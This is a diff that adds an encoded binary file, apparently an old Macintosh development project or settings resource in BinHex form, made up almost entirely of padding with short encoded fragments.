+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!&!!!"!!!"Z`)
+"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"3!!!J!!!E`#!3!!!!!!!3!
+"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!8!!!-!!!'p!J%!!!!!!!%!!3%!!!!!!!!
+!!!!!!!!"!!!!!!!!!!!&!!!%!!!"[J)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!
+!!!!!!!!!"3!!"3!!!Em#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!8
+!!!B!!!(!!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!&!!!(!!!"`3)
+"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"3!!#!!!!F)#!3!!!!!!!3!
+"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!8!!!N!!!($!J%!!!!!!!%!!3%!!!!!!!!
+!!!!!!!!"!!!!!!!!!!!&!!!+!!!"a!)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!
+!!!!!!!!!"3!!#`!!!F8#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!8
+!!!`!!!('!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!&!!!0!!!"a`)
+"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"3!!$J!!!FJ#!3!!!!!!!3!
+"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!8!!!m!!!(*!J%!!!!!!!%!!3%!!!!!!!!
+!!!!!!!!"!!!!!!!!!!!&!!!3!!!"bJ)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!
+!!!!!!!!!"3!!%3!!!FX#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!8
+!!")!!!(-!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!&!!!6!!!"c3)
+"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"3!!&!!!!G`#!3!!!!!!!3!
+"!`!!!!!!!!!!!!!!!!%!!!!!!!!!!!8!!"8!!!(G!J%!!!!!!!%!!3-!!!!!!!!
+!!!!!!!!"!!!!!!!!!!!&!!!@!!!"hJ)"!!!!!!!"!!%$!!!!!!!!!!!!!!!!!3!
+!!!!!!!!!"3!!&`!!!G-#!3!!!!!!!3!"!`!!!!!!!!!!!!!!!!%!!!!!!!!!!!8
+!!"J!!!(D!J%!!!!!!!%!!3-!!!!!!!!!!!!!!!!"!!!!!!!!!!!&!!!C!!!"e3)
+"!!!!!!!"!!%$!!!!!!!!!!!!!!!!!3!!!!!!!!!!"3!!'J!!!GB#!3!!!!!!!3!
+"!`!!!!!!!!!!!!!!!!%!!!!!!!!!!!8!!"X!!!(A!J%!!!!!!!%!!3-!!!!!!!!
+!!!!!!!!"!!!!!!!!!!!&!!!F!!!"e!)"!!!!!!!"!!%$!!!!!!!!!!!!!!!!!3!
+!!!!!!!!!"3!!(3!!!GJ#!3!!!!!!!3!"!`!!!!!!!!!!!!!!!!%!!!!!!!!!!!8
+!!"i!!!(C!J%!!!!!!!%!!3-!!!!!!!!!!!!!!!!"!!!!!!!!!!!&!!!I!!!"h`3
+"!!!!!!!!!!%$!!!!!!!!!!!!!!!!J3!!!!!!!!!!"3!!)!!!!H!#!3!!!!!!!3!
+"!`!!!!!!!!!!!!!!!)%!!!!!!!!!!!!!!!!!!!!"!!!!!J!!!!-!!!!%!!!!"3!
+!!!B!!!!(!!!!#!!!!!N!!!!+!!!!#`!!!!`!!!!0!!!!$J!!!!m!!!!3!!!!%3!
+!!")!!!!@!!!!'`!!!"J!!!!C!!!!'J!!!"`!!!!G!!!!&`!!!"-!!!!8!!!!&3!
+!!"i!!!!I!!!!)!!!!#!&!!!!"3!!)!!!!GX!!3!F!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!"3!!!38!!!)&!!!$"3!!"!8!!!8&!!!'"3!!"`8!!!J&!!!*"3!!#J8
+!!!X&!!!-"3!!$38!!!i&!!!2"3!!%!8!!"%&!!!5"3!!)!8!!"m&!!!6"3!!&!8
+!!"8&!!!@"3!!(38!!"i&!!!F"3!!'!8!!"F&!!!C"3!!'J8!!"X!!J!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!,#2Z!!!!!!!!!"!!,#4r!!!J!!!!!!!!!
+!!!!#`MD!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!J!!!3!!!!!
+&!!"rr`!!!!"rr`!!!!"rr`!!!!"rr`!!!!`!!3!#!!B!!!!&3!!!#!!"!!%k!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3!!!2rrrrm!!!!
+$!!%!!6Sk!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!!
+!rrrrr`!!!!3!!3!"1MTTEQ0XG@4P1J!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!$rrrrr3!!!!J!"!!%k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!2rrrrp!!!!$!!%!!6Sk1NG98dNkD@jME(9NC6S!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!rrrrrd!!!!3!!3!"1MSk4e9656TXD@)
+k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!$rrrrr3!!!"3!#!!%k6@&
+M6e-J8h9`F'pbG$S!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3!!!2rrrrp!!!!
+'!!)!!6T08d`k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!!
+!rrrrrd!!!!F!#J!!6@&M6e-J8&"$)%aTEQYPFJ!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!6'PL8e0-)&"33`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!%k!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#!!&0B@028b"38%-J6'PZDf9
+b!!!!!!!!!!!!!!!!!!!!!!!H39"36!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"J!!!!3A"`E!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!"J!!!!68e-3J!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!6'PL)%PYF'pbG#"38%-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!69"-4J!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!6'PL)%PYF'pbG#"38%-!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!69G$4!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"J!!!!8P053`!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!"J!!!!9%9B9#jLD!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!3Q&XE'p[EL")C@a`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j
+M!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#jM+bX!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j
+MB`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#jMF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j
+MF(!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#jPH(!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j
+RB`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!4f&YC80[C'8J3fpZGQ9bG'9
+b!!!!!!!!!!!!!!!!!!"!!!!!9%9B9#jS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!!!!!!!!!!!!!!!!!!!!!3!!!!9%9B9#j
+X!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!4QaPH#"3FQ9`FQpMCA0cEh)
+!!!!!!!!!!!!!!!!!!!#!!!!!9%9B9#j`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!69FJ8'&cBf&X)&"33`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j
+`BA-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!69FJ8'&cBf&X)&"33`!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j`BfJ!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!!!!!!!!!!!!!!!!!!!!#!!!!!9%9B9#j
+`BfJV+`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!69FJ3bp$+bXJ8&"$!!!!!!!
+!!!!!!!!!!!!!!!!!!!#!!!!!9%9B9#j`F(8!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!69FJ8'&cBf&X)&"33`!!!!!!!!!!!!!!!!!!!!!!!!#!!!!!9%9B9#j
+b!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!8Q9k!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#jc!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!8&"$3A0Y!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!9%9B9#j
+j!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3QPcEfiJ8(*PF(*[Bf9cFfp
+b!!!!!!!!!!!!!!!!!!#!!!!!@%024J!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!@%024NBJ5@e`Eh*d)&"33`!!!!!!!!!!!!!!!!!!!!!!!!!!C'pMG3!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!"J!!!!FR0bB`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"J!!!!FfKXBJ!
